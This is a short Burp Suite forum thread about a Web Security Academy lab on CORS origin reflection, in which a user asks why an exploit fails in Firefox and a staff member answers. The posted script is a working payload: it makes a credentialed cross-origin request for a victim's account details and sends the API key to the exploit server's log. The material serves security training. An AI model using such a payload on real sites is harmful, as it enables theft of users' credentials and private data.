The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

Lab: CORS vulnerability with basic origin reflection

Ngts | Last updated: Mar 01, 2023 07:46AM UTC

Why do I see this message in Firefox when I click on "View exploit", but sending it to the victim works? (Reason: CORS header ‘Access-Control-Allow-Origin’ missing). Status code: 401.

Code:

```html
<script>
  // Cross-origin request that includes the browser's cookies for the lab site
  fetch('https://xxxx.web-security-academy.net/accountDetails', {
    credentials: 'include',
  })
    .then(response => response.json())
    .then(resp => {
      // Navigate to the exploit server's log path with the API key in the query string
      location = '/logs?key=' + resp.apikey;
    });
</script>
```

Also, looking at the response, I see there are no ‘Access-Control-Allow-*’ headers received in the preflight request. Though when I switch my code to use XMLHttpRequest, it works perfectly fine.

Michelle, PortSwigger Agent | Last updated: Mar 03, 2023 12:08PM UTC

The victim in the labs will be using Chrome, so it can be worth checking the behavior in the same browser when testing out exploits. I hope this helps.

Trevor | Last updated: Mar 03, 2023 03:58PM UTC